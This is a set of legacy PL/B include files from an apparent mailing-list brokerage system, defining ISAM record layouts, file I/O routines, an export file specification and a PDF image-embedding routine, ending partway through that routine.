.NOTE(review): BALANCE is commented 9-17 (9 bytes) for a FORM 7.2 -- the
.positions are consistent with the FIXED=21 record, but confirm the form width.
mobvars list
nmobMLR DIM 4 1-4 CLIENT NUMBER "KEY".
nmobmCNT DIM 3 5-7 MAILER CONTACT NUMBER "KEY".
.MBILLTO DIM 1 8-8 MAILER BILL-TO NUMBER.
BALANCE FORM 7.2 9-17 AMOUNT ON ACCOUNT
nmobbrk dim 4 18-21 broker/consultant. "KEY"
Listend
...............................................................................
<file_sep>/include/NONODD.INC
..............................................................................
.
. NONODD INCLUSION
. NIN ORDER NOTES FILE DEFINITION
.
. FILE NAME : ORDNOTES
. REC LENGTH: 521 VARIABLE
. INDEX KEY : 1- (6 POSITION LIST ORDER #, DUPLICATES ALLOWED)
.
..............................................................................
.
. PATCH 1.2 DMS 13JUN2006 Replaced NLINEX vars with single NLINE VAR.
. Associated with nordtest patch "3.78.3"
. Also converted ordnotes file.
; PATCH 1.1 DMB 18JUN2005 Changed IP of File Manager
.START PATCH 1.2 REPLACE LOGIC
.NONOFILE IFILE KEYLEN=6,VAR=381
.Order notes file: variable-length records, duplicates allowed, keyed by LR#.
NONOFILE IFILE KEYLEN=6,VAR=521
.END PATCH 1.2 REPLACE LOGIC
.START PATCH 1/8/2003 ASH - ADDED TO FILE MANAGER
.NONONAME INIT "ORDNOTES "
.>Patch 1.1 Begin
.NONONAME INIT "ORDNOTES.isi|20.20.30.103:502"
NONONAME INIT "ORDNOTES.isi|NINS1:502"
.>Patch 1.1 End
.END PATCH 1/8/2003 ASH - ADDED TO FILE MANAGER
.
NONOFLD DIM 6 .key work field (LR number)
NONOFLAG FORM 1
******************************************************************************
.
.START PATCH 1.2 ADDED LOGIC
ORDNOTESVARS LIST
.END PATCH 1.2 ADDED LOGIC
NOTEKEY DIM 6 1-6 *LR NUMBER KEY.
NDATE DIM 8 7-14 *DATE OF NOTE. MMDDYYCC
NTIME DIM 4 15-18 *TIME OF NOTE HHMM
.START PATCH 1.2 REPLACED LOGIC
.NLINE1 DIM 60 19-78
.NLINE2 DIM 60 79-138
.NLINE3 DIM 60 139-198
.NLINE4 DIM 60 199-258
.NLINE5 DIM 60 259-318
.NLINE6 DIM 60 319-378
.NINITS DIM 3 379-381
NLINE DIM 500 19-518 .single free-text note body (replaced NLINE1-6)
NINITS DIM 3 519-521 .typist initials
.END PATCH 1.2 REPLACED LOGIC
.START PATCH 1.2 ADDED LOGIC
LISTEND
.END PATCH 1.2 ADDED LOGIC
.
<file_sep>/include/Nmlr2dd.INC
..............................................................................
.
. NMLR2DD INCLUSION
. NIN MAILER NOTES FILE DEFINITION
.
. FILE NAME : NINMLR2
. REC LENGTH: 754
. INDEX KEY : 1-4
.
.ASH 29DEC2000 - FILE CREATED
..............................................................................
.
.Mailer notes file: variable-length, one record per 4-byte mailer number.
NMLR2FILE IFILE KEYLEN=4,VAR=754,NODUPLICATES
.NMLR2NAME INIT "NINMLR2.ISI|20.20.30.103:502"
NMLR2NAME INIT "NINMLR2.ISI"
NMLR2FLD DIM 4 .key work field (mailer number)
NMLR2FLAG FORM 1
nMLR2lock form 1 0 or 1 - filepi, 2 = record locking, 3 = no locks
..............................................................................
NMLR2VARS list
MLR2MLR dim 4 1-4 MLR NUMBER
MLR2NOTES DIM 750 5-754 MLR NOTES
listend
<file_sep>/include/INTEGRAL.INC
FILE SPECS
*******************************************
***************LRFile.dat******************
*******************************************
Order Status 1 Text “0”=Live, “B”=Billed, “Q”=Cancelled Billed, “X”=Cancelled, “l”=LCR, “z”=Cancelled LCR, “p”=Pending, “x”=Cancelled Pending
Mailer Number 4 Numeric
LR Number (Key) 6 Numeric
List Number 6 Numeric
List Owner Number 4 Numeric
Mailer Purchase Order Number 12 Text
Order Quantity 9 Numeric
Mailer Key 12 Text
Return Date 8 Numeric
Mail Date 8 Numeric
Entire/Rent/Exchange Code 1 Numeric “1”=Entire, “2”=Exchange, “3”=Entire & Exchange
Order Net Quantity 9 Numeric
Order Campaign Number 6 Numeric
*Exchange Price per Thousand 5 Numeric
Return To Company Number 4 Numeric
NINCA Contact Code 2 Numeric
NINCA Caller Code 2 Numeric
Order Date 8 Numeric
Order Exchange Quantity 9 Numeric
Broker Number 4 Numeric
Broker Contact Number 3 Numeric
Net Name Percentage 2 Numeric
Net Price (Run Fee/Charge) 6 Decimal
Mailer Name 45 Text
Owner Name 25 Text
Broker Name 45 Text
Merge Percentage 10 Numeric Merge % Percentage for this LR
Last Merge % for Mlr/List 6 Numeric Merge % for LR with this Mlr/List with latest Order Date
LCR/Pending Order SubStatus Desc. 45 Text Will remain blank until LCRs/Pending Orders are sent to Integral
Gross Billed Quantity 8 Numeric
Net Merge Quantity 8 Numeric
Total Billed (AR) 10.2 Numeric (total of 13 bytes)
Base Price 5.2 Numeric
Select Price 5.2 Numeric If applicable
Price Calculator 20 Text "/m", "Flat", etc.
Select Number 4 Numeric Valid Number OR "XXXX" = keyed in Select OR "----" = Order placed before new Datacard logic
Select Name 75 Text
Test/Continuation Code 1 Numeric "1"=Test, "2"=Retest, " "=Continuation
*********************************************
***************ListFile.dat******************
*********************************************
List Number(Key) 6 Numeric
List Name 75 Text
Status 1 Text "W"=Withdrawn, "T"=Temporarily Withdrawn
Universe 9 Numeric
Gender Info 15 Text
Owner Number 4 Numeric
*********************************************
***************SelFile.dat******************
*********************************************
List Number(Key) 6 Numeric
Select Number (Key) 4 Unique Numeric Identifier
Select Name 75 Text
Select Quantity 10 Numeric
Select Price 5.2 Numeric (Total of 8 bytes)
If the record is a Base/Secondary Base or unassociated Select,
this field represents the total Select Price. If the record
does have an associated Base/Secondary Base, this field would need
to be added to the Select Price of the associated Base/Secondary Base
in order to achieve the correct total. It was done this way to allow
different print options.
Commission Flag 1 Numeric
Price Modifier 3 Numeric
Inactive Flag 1 Numeric '1' = Inactive Select
Select Status 1 Numeric '1' = Special (does not print), '2' = Office Use Only
Notes Flag 1 Numeric '1' = User should view Notes field in corresponding Datacard
Exchange Flag 1 Numeric ' ' or '0' = Exchange or Rent, '1' = Exchange Only, '2' = Rental Only
Base Association 4 Text 'BASE' = Base Select - 1 per Datacard
'SEC.' = Secondary Base Select - 0+ per Datacard
A 4 byte Numeric field in this location establishes this record as a Select
off of a Base/Secondary Base. That 4 byte number would be the corresponding
Select Number of a Base/Secondary Base record.
There is the possibility of no data in this location. This would pertain to a Select
that is independent of an associated Base/Secondary Base, but is not a Base/Secondary Base
itself.
Index Flag 4 Numeric Established Print/Display order of Select Records for a Datacard
Select Date 8 Numeric
Initials 3 Text
Filler 11 Text
*********************************************
***************TxtFile.dat******************
*********************************************
(Unique identifier starts at '1', allowing up to nine 500 byte records of Free Text per Datacard.)
Datacard Number 6 Numeric
Text Number 1 Numeric
Text 500 Text
********************************************
***************PkgFile.dat******************
********************************************
(The following fields are mutually exclusive: )
(Master Package Indicator)
(Master Package Association Number)
(Note on Master Packages: A Master Package will have an Indicator value of "1",)
(and the Association Number will be cleared. Regular Packages may have a valid)
(Master Package Number in the Association Number field.)
Mailer Number(Key) 6 Numeric
Package Number(Key) 6 Numeric
Package Name 150 Text
Client Package ID 25 Text
Package Date 8 Numeric
Package Notes 500 Text
Master Package Indicator 1 Numeric
Master Package Association Number 6 Numeric
Filler 91 Text
Cross-Reference for New 6 byte Mailer Number
____________________
New Old
____________________
000619 0173 (TNC)
000811 0055 (USF)
000933 0193 (DCCC)
000861 0108 (EarthJustice)
001016 0308 (HRC)
000899 0153 (League of Cons.)
003948 4261 (21st Century)
002094 1921 (Witness)
000830 0075 (PFAW)
000843 0088 (EngenderHealth)
001173 0532 (OxFam)
001385 0808 (Amer. Rivers)
007754 8881 (WaterKeeper)
000590 0031 (AFT)
008218 9366 (Dean 4 Amer.)
004117 4450 (Ducks Unlim.)
000828 0073 (NOW)
008637 0276 (NGLTF)
000834 0079 (Int. Rescue)
000913 0170 (NWF)
001238 0620 (NPCA)
002859 3028 (Farm Sanctuary)
000929 0188 (Defenders of Wildlife)
001226 0601 (CARE)
001882 1604 (Special Olympics International)
001082 0400 (PETA)
000814 0059 (Kennedy for Senate)
009318 1443 (Committee for a Democratic Majority)
*********************************************
***************PkgPFile.dat******************
*********************************************
Mailer Number(Key) 6 Numeric
Package Number(Key) 6 Numeric
Price Date(Key) 8 Numeric
Package Print Price 6.2 Numeric (total of 9 bytes)
Package Postage Price 6.2 Numeric (total of 9 bytes)
Package Premium Price 6.2 Numeric (total of 9 bytes)
Package Total Price 8.2 Numeric (total of 10 bytes)
Price Notes 200 Text
Filler 97 Text
*********************************************
***************XRefFile.dat******************
*********************************************
List Number(Key) 6 Numeric
Mailer Number(Key) 6 Numeric
*********************************************
***************ExchFile.dat******************
*********************************************
(Note on Inactivated Date: This field will USUALLY contain valid data)
(if the Flag has a value of "I". Otherwise do not be surprised to find garbage)
(in this field!)
Mailer1 Number(Key) 6 Numeric
Mailer2 Number(Key) 6 Numeric
Inactivated Date 8 Text** See Notes
Entry Number 5 Numeric
Flag 1 Text " "=normal, "I" = inactive
Mailer1 Usage 10 Numeric
Mailer2 Usage 10 Numeric
*********************************************
***************PrcFile.dat******************
*********************************************
(Additional Prices associated with an Order)
LR Number (Key) 6 Numeric
LR/LOL Code (Key) 1 Numeric
Additional Price Code (Key) 1 Text "A" = Fixed Fees
Additional Price Number (Key) 3 Numeric
Additional Price Amount 5.2 Numeric
Additional Price Text 46 Text
Additional Price Calculator 20 Text
*********************************************
***************PkgFile2.dat******************
*********************************************
LR Number (Key) 6 Numeric
Package Record Code (Key) 1 Numeric "1" = LR, "0" = LOL
Package Number 6 Numeric
Package Total Price 8.2 Numeric (total of 10 bytes)
*********************************************
***************ConFile.dat******************
*********************************************
Contact Number (Key) 2 Numeric
Contact Name 35 Text
Contact Phone Number 25 Text
Contact Port Number 3 Numeric
Team Number 2 Numeric (Not implemented)
Rights 1 Numeric (Not implemented)
Rights 2 40 Numeric (Not implemented)
Default Printer 1 Numeric
Caller/Planner 1 Numeric
<file_sep>/include/IncLdd.inc
..............................................................................
.
. IncLDD INCLUSION
. NIN Income report Data Descriptors
.
. FILE NAME : IncLists.dat
. REC LENGTH: 527 FIXED
. INDEX KEY : (1) 1-6 (List #)
.
.INcome by List data descriptor
.used for List management income reporting to Owners
.
.
.
. IncLists: income-by-list report configuration. ISAM, 6-byte key
. (list number), fixed 527-byte records, served by file manager NINS1:502.
IncLNAME INIT "IncLists.ISI|NINS1:502"
IncLFILE IFILE KEYLEN=6,FIXED=527
. IncLFLD holds the key for reads; IncLFLAG is the open flag.
IncLFLD DIM 6
IncLFLAG FORM 1
INCLVARS LIST
INCList DIM 6 1-6
INCDATEBY DIM 1 7-7 'M' by Mail date, 'O' by Order date
INCLTYPE DIM 1 8-8 Basis 'C' Cash, 'I' Invoice
. 2 Records required if Both Cash & Accrual
LMONTH FORM 2 9-10 Fiscal Month '1-12'
IncREP1 DIM 1 11-11 Report option 1 Type 'M' Monthly, 'Q' Quarterly, 'V' Monthly with Variance
. 2 Records required if Both monthly & quarterly
IncREP2 DIM 1 12-12 Report option 2 report with projections 'Y' = Include Variance
IncREP3 DIM 1 13-13 Report option 3 Not used
IncLYEAR FORM 4 14-17 Beginning year for report (drop data prior to being our list)
IncRECIPIENT DIM 255 18-272 Email address of recipient
IncCOMMENTS DIM 255 273-527 not used
listend
<file_sep>/include/NSPEIO.INC
..............................................................................
.
. NSPEIO INCLUSION
. NIN ORDER 00/99/98 FILE DEFINITION
.
. FILE NAME : NINSPEC
. REC LENGTH: 288 COMP
. INDEX KEY : 1-2
. Last Update Added logic to thwart I44 errors for defunct Key values - forcing setting of OVER flag - ASH 5/20/04
. Last Update Added trap IO trap logic ASH May 11,1999
. Last update aDD nspelock DLH 10Jun98
..............................................................................
.
. ENTRY POINT : NSPEKEY
. REQUIRED : 'NSPEFLD'
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. NSPEKEY: exact keyed read of the special-instruction record into
. NSPEVARS using the key in NSPEFLD. Opens the file on first use.
. Locking mode is selected by NSPELOCK (1=FILEPI, 2=record lock, 3=none).
. Caller must test the returned flags (e.g. OVER) itself.
NSPEKEY
. Last Update Added logic to thwart I44 errors for defunct Key values - forcing setting of OVER flag - ASH 5/20/04
.START PATCH 5/20/2004 ADDED LOGIC - ASH
. an empty key would raise I44; restore flags "0001" instead so the
. caller sees a not-found condition and no read is attempted
call Trim using NSPEFLD
if (NSPEFLD = "")
flagrestore "0001"
return
endif
.END PATCH 5/20/2004 ADDED LOGIC - ASH
BRANCH NSPEFLAG TO NSPE1
CALL NSPEOPEN
NSPE1 trap IOMssg giving Error if IO
branch nspelock of nspe1L,Nspe1R,Nspe1N
.default FIlepi's active
Nspe1L FILEPI 1;NSPEFILE
READ NSPEFILE,NSPEFLD;NSPEVARS
trapclr IO
RETURN
.with record locks . note file open must have had flag set
Nspe1R
READLK NSPEFILE,NSPEFLD;NSPEVARS
trapclr IO
RETURN
.No locks
Nspe1N
READ NSPEFILE,NSPEFLD;NSPEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPETST
. REQUIRED : MKEY
. RETURNED :
. DESCRIPTION : TEST KEY
.
. NSPETST: probe for the key in NSPEFLD without loading NSPEVARS —
. the record is read into STR1 and only the resulting flags matter.
. Note the FILEPI line is commented out, so the probe is not interlocked.
NSPETST BRANCH NSPEFLAG TO NSPE2
CALL NSPEOPEN
NSPE2 trap IOMssg giving Error if IO
. FILEPI 1;NSPEFILE
READ NSPEFILE,NSPEFLD;STR1
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPEKS
. REQUIRED :
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : KEY SEQUENTIAL SPECIAL INSTRUCTION FILE READ
.
. NSPEKS: key-sequential read (next record in key order) into NSPEVARS,
. honoring the NSPELOCK mode (1=FILEPI, 2=READKSLK record lock, 3=none).
NSPEKS BRANCH NSPEFLAG TO NSPE3
CALL NSPEOPEN
NSPE3 trap IOMssg giving Error if IO
BRANCH NSPELOCK OF NSPE3L,NSPE3R,NSPE3N
NSPE3L FILEPI 1;NSPEFILE
READKS NSPEFILE;NSPEVARS
trapclr IO
RETURN
NSPE3R
READKSLK NSPEFILE;NSPEVARS
trapclr IO
RETURN
NSPE3N
READKS NSPEFILE;NSPEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPESEQ
. REQUIRED :
. RETURNED : SPECIAL INSTRUCTION RECORD
. DESCRIPTION : SEQUENTIAL SPECIAL INSTRUCTION FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
. NSPESEQ: physical-sequential read into NSPEVARS, honoring NSPELOCK
. (1=FILEPI, 2=READLK record lock, 3=none). Caller tests flags.
NSPESEQ BRANCH NSPEFLAG TO NSPE4
CALL NSPEOPEN
NSPE4 trap IOMssg giving Error if IO
BRANCH NSPELOCK OF NSPE4L,NSPE4R,NSPE4N
NSPE4L FILEPI 1;NSPEFILE
READ NSPEFILE,SEQ;NSPEVARS
trapclr IO
RETURN
NSPE4R
READLK NSPEFILE,SEQ;NSPEVARS
trapclr IO
RETURN
NSPE4N
READ NSPEFILE,SEQ;NSPEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPEWRT
. REQUIRED : 'MKEY'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
. NSPEWRT: insert NSPEVARS under the key in NSPEFLD (*+ = auto key insert).
. Only two lock branches exist here; an NSPELOCK value of 3 falls through
. to the FILEPI path. The two WRITE paths differ only in the FILEPI
. interlock — NOTE(review): the no-lock path issues no lock at all.
NSPEWRT BRANCH NSPEFLAG OF NSPE5
CALL NSPEOPEN
NSPE5 trap IOMssg giving Error if IO
BRANCH NSPELOCK TO NSPE5L,NSPE5R
NSPE5L FILEPI 1;NSPEFILE
WRITE NSPEFILE,NSPEFLD;*+,NSPEVARS
trapclr IO
RETURN
NSPE5R
WRITE NSPEFILE,NSPEFLD;*+,NSPEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPEDEL
. REQUIRED : 'MKEY'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
. NSPEDEL: delete the record whose key is in NSPEFLD, always under a
. FILEPI interlock (NSPELOCK is not consulted for deletes).
NSPEDEL BRANCH NSPEFLAG TO NSPE7
CALL NSPEOPEn
NSPE7 trap IOMssg giving Error if IO
FILEPI 1;NSPEFILE
DELETE NSPEFILE,NSPEFLD
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NSPEOPEN
. REQUIRED : 'NSPEFLAG'
. RETURNED : 'NSPEFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN SPECIAL INSTRUCTION FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
. NSPEOPEN: open NSPENAME and set NSPEFLAG to 1 on success.
. NSPELOCK=1 opens normally; NSPELOCK=2 opens LOCKMANUAL,SINGLE for
. record locking (any other value falls through to the normal open).
. On IO failure control traps to NSPEGONE, which reports via FILEGONE.
NSPEOPEN TRAP NSPEGONE IF IO
BRANCH NSPELOCK TO NSPEOPNL,NSPEOPNR
NSPEOPNL OPEN NSPEFILE,NSPENAME
TRAPCLR IO
MOVE C1 TO NSPEFLAG
RETURN
NSPEOPNR OPEN NSPEFILE,NSPENAME,LOCKMANUAL,SINGLE
TRAPCLR IO
MOVE C1 TO NSPEFLAG
RETURN
.
NSPEGONE MOVE NSPENAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NCOUDD.INC
; Last change: JLO 1 Jul 96 8:35 am
* *****************************************************************************
* NAMES IN THE NEWS MASTER COUNTS FILE.
* *****************************************************************************
.
. FILE: TRIPLEXCOUNT
. LENGTH: 62
.COMPRESS: NONE
. TYPE: ISAM
. KEY: 1-14 CTLIST,CTRTYPE,CTSTYPE
...............................................................................
. TDMCOUNT: master counts file. ISAM, 14-byte compound key
. (CTLIST + CTRTYPE + CTSTYPE). Record length 62, no compression.
NCOUFILE IFILE KEYL=14
NCOUNAME INIT "TDMCOUNT"
NCOUFLD DIM 14
NCOUFLAG FORM 1
NCOUPATH FORM 1
*******************************************************************************
*COUNTSVAR - VARIABLE INCLUSION FOR COUNTS SYSTEM 19-MAY-87.
*******************************************************************************
* THERE ARE FOUR RECORD TYPES FOR EVERY LIST*
* 1. LIST NAME RECORD 1-RECORD OF THIS TYPE PER LIST.
* 2. SEX RECORD 1-RECORD OF THIS TYPE PER LIST.
* 3. SCF RECORD X-RECORDS OF THIS TYPE PER LIST (ONE FOR EVERY SCF THAT HAS
* NAMES.)
* 4. DTT RECORD 1-RECORD OF THIS TYPE PER LIST.
* ******** LIST NAME TYPE *****************************************************
. CTKEY overlays the three key components as one 14-byte field.
CTKEY DIM 14 REDEFINES CTLIST,CTRTYPE,CTSTYPE.
.
CTLIST DIM 8 1-8 KEY LIST NUMBER=00+NINCA LIST #.
CTRTYPE DIM 3 9-11 KEY RECORD TYPE='LID'
CTSTYPE DIM 3 12-14 KEY RECORD SUB TYPE='000'
CTLISTN DIM 48 15-62 LIST NAME
.
* ******** SEX RECORD TYPE ****************************************************
.CTLIST DIM 8 1-8 KEY LIST NUMBER=00+NINCA LIST #.
.CTRTYPE DIM 3 9-11 KEY RECORD TYPE='SEX'
.CTSTYPE DIM 3 12-14 KEY RECORD SUB TYPE='000'
CTMALE FORM 8 15-22 MALE COUNT
CTFEMALE FORM 8 23-30 FEMALE COUNT
CTDUAL FORM 8 31-38 DUAL COUNT
CTCOMP FORM 8 39-46 COMPANY COUNT
CTUNKN FORM 8 47-54 UNKNOWN COUNT
CTSEED FORM 8 55-62 SEED COUNT
* ******** SCF RECORD TYPE ****************************************************
. only CTTOTAL is live for SCF records; the per-sex fields above are
. reused at different offsets (shown dotted-out here for reference).
.CTLIST DIM 8 1-8 KEY LIST NUMBER=00+NINCA LIST #.
.CTRTYPE DIM 3 9-11 KEY RECORD TYPE='SCF'
.CTSTYPE DIM 3 12-14 KEY RECORD SUB TYPE="001 TO 999'
.CTUNKN FORM 8 15-22 UNKNOWN COUNT
.CTFEMALE FORM 8 23-30 FEMALE COUNT
.CTMALE FORM 8 31-38 MALE COUNT
.CTDUAL FORM 8 39-46 DUAL COUNT
.CTCOMP FORM 8 47-54 COMPANY COUNT
CTTOTAL FORM 8 55-62 RECORD TOTAL
* ******** DTT RECORD TYPE ****************************************************
.CTLIST DIM 8 1-8 KEY LIST NUMBER=00+NINCA LIST #.
.CTRTYPE DIM 3 9-11 KEY RECORD TYPE='DTT'
.CTSTYPE DIM 3 12-14 KEY RECORD SUB TYPE='000'
CTDATE DIM 8 15-22 DATE COUNTS UPDATED
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.misc required vars.
. literal record-type tags used when building CTRTYPE key values
LST INIT "LID"
SCF INIT "SCF"
SEX1 INIT "SEX"
ZIP INIT "ZIP"
DTT INIT "DTT"
<file_sep>/include/nord4dd.inc
..............................................................................
.
. nord4D3D INCLUSION
. NIN supplemental Pending order Approval/Clearance ORDER FILE DEFINITION
.
. FILE NAME : NInord4xxxxx???
. REC LENGTH: 26 FIXED
. INDEX KEY : (1) 1-6 (LR#)
.
. Release 1.3 DLH add "Waiting for Pricing Approval"
. PATCH 1.2 Changed IP of File Manager DMB 18JUN05
. Patch 1.1 Added file to File Manager ASH 07AUG01
.
. NInord4: pending/clearance status sidecar keyed by LR number.
. ISAM, 6-byte key, fixed 26-byte records, served by file manager NINS1:502.
.START PATCH 1.1 REPLACED LOGIC
.nord4NAME Init "NInord4"
.Patch 1.2 Begin
.nord4NAME Init "NInord4.ISI|20.20.30.103:502"
nord4NAME Init "NInord4.ISI|NINS1:502"
.Patch 1.2 End
.END PATCH 1.1 REPLACED LOGIC
nord4FILE IFILE KEYLEN=6,FIXED=26
nord4FLD DIM 6
nord4FLAG FORM 1
nord4PATH FORM 1
nord4lock form 1
.
.
ORd4VARS LIST
nord4lr DIM 6 001-006 ORDER LR
nord4STAT DIM 2 007-008 Pending STATUS:
. 0 OR " " = pending 5 = at service bureau
. 1 = waiting for guar 6 = Denied
. 2 = waiting for brk call 7 = cancelled
. 3 = waiting for prepayment 8 = approved
. 4 = waiting for revision 9 = received
.10 = Accounting Hold 11 = 2nd Request
.12 = Revised Request 13 = Waiting for List Usage Agreement
.14 = Waiting for Sample 15 = Waiting for Counts
.begin patch 1.3
.16 = Waiting Pricing Approval
.end patch 1.3
nordpdte DIM 8 009-016 DATE entered ccyymmdd
.note actual order date changes to date approved (if approved)
nord4STA2 DIM 2 017-018 Clearance STATUS:
.see notes from sales
.
nord4Cdte DIM 8 019-026 DATE entered ccyymmdd
.note actual order date changes to date approved (if approved)
listend
* .......................................................................
<file_sep>/DEVELOP/Includes - why/pdfimg.inc
.
. pdf image support
.
. Aug 03 2011 added jpeg support
.
. support up to 100 unique images.
.
. Aug 11 2011 added jpeg
. Aug 11 2011 logic to preserve aspect ratio of original image
.
. per-run cache of up to 99 distinct images already embedded in the PDF:
. file name, assigned PDF object number, and pixel dimensions.
. ImageNum receives the match index from the SEARCH in PDFImage.
ImageFNames dim ^250(99)
ImageObjNum form 4(99)
ImageWidth integer 4(99)
ImageHeight integer 4(99)
ImageNum form 2
.
. PDFImage: place a BMP or JPEG image on the current PDF page.
. top/bottom/left/right : target rectangle, converted to PDF units via
. CVTVUnit/CVTHUnit and offset by MarginL; ImageFileName : path, with
. the type detected from the extension (.jpg/.jpeg/.bmp).
. First use of a file emits an image /XObject and caches it in the
. ImageFNames/ImageObjNum arrays; later uses reuse the cached object.
. In both cases the q/cm/Do/Q operators are appended to the page content.
. Relies on globals declared elsewhere in the PDF library:
. pdffile, xref(), ObjNum, pictnum, scratch, page()/Page(), curpage,
. MarginL, CRLF, fzero.
PDFImage FUNCTION
top form 5.2
bottom form 5.2
left form 5.2
right form 5.2
ImageFileName dim 250
ENTRY
.
. images are an Xobject that are basically resources to a page.
. They are then referenced in the page by the following within the data stream:
. q %save graphics state
. /Image1 Do %draw the image
. Q % restore graphics state
.
. this routine therefor has to generate the Xobject and the stream commands.
.
. Note to self...Page resources in the code above are currently not dynamic enough
.
. path Resources needs /XObject << /Image1 resnum subnum R >>
.
. resnum subnum obj
. <<
. /Type /XObject
. /Subtype /Image
. /Width {image width}
. /Height {image height}
. /ColorSpace /DeviceRGB
. /BitsPerComponent {1 2 4 8 16} % 8 = 24 bit image
. /Filter [ /DCTDecode ] %option used for JPEG images, not needed for BMP
. >>
. stream
. {image data}
. endstream
. endobj
.
BMPr RECORD
type integer 4
width integer 4
height integer 4
wb integer 4 //widthbytes
planes integer 2
bitspix integer 2
bits integer 4
recordend
fm10 form 10
BMPFileHdr RECORD
type dim 2 //"BM"
size integer 4
res integer 4
offbits integer 4
recordend
bmpi record
size integer 4
width integer 4
height integer 4
planes integer 2
bitcount integer 2
compres integer 4
szimg integer 4
xppm integer 4
yppm integer 4
clruse integer 4
clrimp integer 4
recordend
char2 dim 2
imgf FILE
strlen form 10
strdat dim ^
.
. pdfpos is written verbatim as the 6 operands of the "cm" matrix:
. width ? ? height horz vert (the two unnamed FORM 2 slots stay blank).
pdfpos record
width form 5.4
form 2 //??
form 2 //??
height form 5.4
horz form 5.4
vert form 5.4
recordend
.
PDFFilter DIM 22
tmp dim 250
jpghead record
tag integer 1
type integer 1
len dim 1(2) // fbo int 2
recordend
.
d2 dim 2
da5 dim 1(5)
tag integer 1,"0xff"
jpgtype integer 1,"0xd8"
sizetyp integer 1,"0xc0"
fpos integer 4
int2 integer 2
.
fscratch1 form 4.5
fscratch2 form 4.5
AspectI form 4.5
AspectO form 4.5
.
content dim 200
.
CALL CVTVUnit giving top using top
CALL CVTVUnit giving bottom using bottom
CALL CVTHUnit giving left using left
CALL CVTHUnit giving right using right
.
. ADD MarginT,top
. ADD MarginT,bottom
ADD MarginL,Left
Add MarginL,right
.
MOVE (Page(curpage).Height-top),pdfpos.vert //pagesize
MOVE left,pdfpos.horz
MOVE (bottom-top),pdfpos.height
MOVE (right-left),pdfpos.width
SUB pdfpos.height,pdfpos.vert // bottom up, not top down.
.
. check if we already have this image resource
.
SEARCH ImageFileName,ImageFNames(1),"99",ImageNum
IF NOT EQUAL
. not cached yet: detect type from the (lowercased) file extension
MOVE ImageFileName,tmp
LOWERCASE tmp
WHEREISLAST ".",tmp,strlen
RETURN if zero // unable to determine image type
RESET tmp,strlen
CHOP tmp
.
SWITCH tmp
CASE ".jpg"
NOBREAK
CASE ".jpeg"
MOVE "/Filter [ /DCTDecode ]",PDFFilter
clear fpos
OPEN imgf,ImageFileName
READ imgf,seq;*abson,jpghead;
. NOTE(review): 'and' only rejects files where BOTH signature bytes
. differ; a strict FF D8 check would reject when either differs
. ('or') — confirm intent before changing.
if ( jpghead.tag != tag and jpghead.type != jpgtype )
close imgf
setflag zero // unsupported image type
return
endif
. jpeg header:
. FF nn tag type ( FF D8 is begin of file and has no size)
. xx xx tag size ( forward byte order )
. xxxxx data
.
. image dimensions are in tag
. FF C0
. 00 11
. 08
. hh ww height width
. walk the marker chain until the SOF0 (FF C0) segment is found
LOOP
ADD "2",fpos
REPOSIT imgf,fpos
READ imgf,seq;*abson,jpghead;
IF OVER
CLOSE imgf
SETFLAG ZERO
RETURN
ENDIF
BREAK If ( jpghead.tag = tag and jpghead.type = sizetyp )
PACK d2,jpghead.len(2),jpghead.len(1)
MOVE d2,int2
ADD int2,fpos
REPEAT
.
. SOF0 payload: [precision][height hi][height lo][width hi][width lo];
. dimensions are stashed in the (otherwise unused) BMPi record
READ imgf,seq;*abson,da5;
PACK d2,da5(3),da5(2)
MOVE d2,int2
MOVE int2,BMPi.height
PACK d2,da5(5),da5(4)
MOVE d2,int2
MOVE int2,BMPi.width
.
. seek to EOF so FPOSIT yields the total length, then re-read the
. whole file as the raw (already DCT-compressed) stream data
READ imgf,EOF;;
FPOSIT imgf,strlen
REPOSIT imgf,fzero
DMAKE strdat,strlen
READ imgf,seq;*ABSON,strdat;
CLOSE imgf
CASE ".bmp" // bitmap
CLEAR PDFFilter
.
. get image data
.
OPEN imgf,ImageFileName
READ imgf,seq;*ABSON,BMPFileHdr;
READ imgf,seq;*ABSON,BMPI;
.
. calculate stream length for image data
.
CALC strlen=BMPFileHdr.size-BMPFileHdr.offbits
DMAKE strdat,strlen
.
. read the image data
.
REPOSIT imgf,BMPFileHdr.offbits
READ imgf,seq;*ABSON,strdat;
IF ( bmpi.bitcount = 16 or bmpi.bitcount = 32 )
CALL cvt24 using bmpi.bitcount,strdat
ENDIF
. convert to PDF stream
CALL BMP2PDF using strdat,BMPi.width,BMPi.height
.
DEFAULT
setflag zero // unsupported image type
RETURN
ENDSWITCH
.
. figure out image scaling and adjust size to prevent stretch
.
MOVE bmpi.width,fscratch1
MOVE bmpi.height,fscratch2
.
CALC aspecti = pdfpos.width / fscratch1
CALC aspecto = pdfpos.height / fscratch2
IF ( aspecti < aspecto )
MOVE (aspecti*fscratch2), pdfpos.height
ELSE
MOVE (aspecto*fscratch1), pdfpos.width
ENDIF
.
. Write the XObject
.
INCR ObjNum
INCR pictnum
SQUEEZE pictnum,char2
SQUEEZE objNum,scratch
.
FPOSIT pdffile,xref(objnum).offset
CLEAR xref(ObjNum).Gen
MOVE "n",xref(ObjNum).type
.
WRITE pdffile,seq;*ll,scratch," 0 obj"
WRITE pdffile,seq;" << /Type /XObject"
WRITE pdffile,seq;" /Subtype /Image"
WRITE pdffile,seq;" /Name /Img",*ll,char2
WRITE pdffile,seq;" /ColorSpace /DeviceRGB ",*ll,PDFFilter
.
